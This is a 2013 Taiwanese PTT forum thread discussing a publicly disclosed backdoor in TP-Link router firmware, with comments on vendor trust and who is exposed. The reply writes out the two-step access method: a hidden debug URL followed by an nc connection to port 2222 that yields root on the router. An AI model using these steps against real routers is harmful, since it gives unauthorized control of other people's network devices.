作者Obb (有趣的世界)
看板Broad_Band
標題Re: [情報] TP-Link 路由器發現後門
時間Sat Mar 16 14:38:57 2013
難怪美國的資訊採購堅持不用 華為設備
但我們三大電信採購買了很多... 真有種
後門進入方式
先
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
再nc 192.168.0.1 2222
獲取TP-Link最高權限。
※ 引述《YuiFAN (半熟魷魚)》之銘言:
: http://www.solidot.org/story?sid=33846
: 安全研究員 Michal Sajdak 在深圳普聯技術有限公司(TP-LINK)的路由器產品
: TL-WDR4300 的韌體中發現了後門漏洞,在通知普聯無果後,公開了漏洞的概念
: 驗證攻擊代碼。
: 受影響的型號包括 TL-WDR4300 和 TL-WR743ND (v1.2 / v2.0) 等,包含遠程
: root 漏洞的韌體版本是去年底發佈的最新版本 3.13.23 Build 122512
: (即2012年12月25日發佈的版本)。Sajdak於 2月12日和22日兩次向普聯發去了
: 詳細介紹漏洞的郵件,都沒有得到任何回應,於是在3月12日公開了漏洞。
: 此漏洞的詳細說明網頁:
: http://sekurak.pl/tp-link-httptftp-backdoor/
--
※ 發信站: 批踢踢實業坊(ptt.cc)
※ 編輯: Obb 來自: 182.18.223.9 (03/16 14:42)
1F:推 litleaf:爛透了!!!!!!!!! 03/16 20:18
2F:推 birdy590:對一般家用戶根本沒有影響, 誰會把網管往外開? 03/16 21:57
3F:→ asdfghjklasd:嗯,要是有人SSID沒加密路過就可以..... 03/16 23:45
4F:→ Obb:那是已公布的後門,還有許多未公布的後門~ 03/17 13:11
5F:→ Obb:to birdy590, 被發現有後門的廠牌 還會有信譽嗎 03/17 13:11
6F:→ Obb: 難怪塔米歐不想再代理這牌子了 03/17 13:14
7F:推 panebhsu:我以為是塔米歐搶不贏建達。 03/17 15:38
8F:推 birdy590:你看過哪家isp的設備httpd是用戶有辦法試連的? 03/17 20:14
9F:推 birdy590:連cisco都被發現過不少後門 所以誰敢開就是自己找危險 03/17 20:16
10F:→ bestpika:我就不信哪家的沒後門,只是剛好沒被找到罷了 03/18 01:17
11F:→ bestpika:或者那些洞都是要在 LAN 底下才會有用 03/18 01:17
12F:→ bluewaterr:華為的中華機房沒看到過啊... 03/19 13:06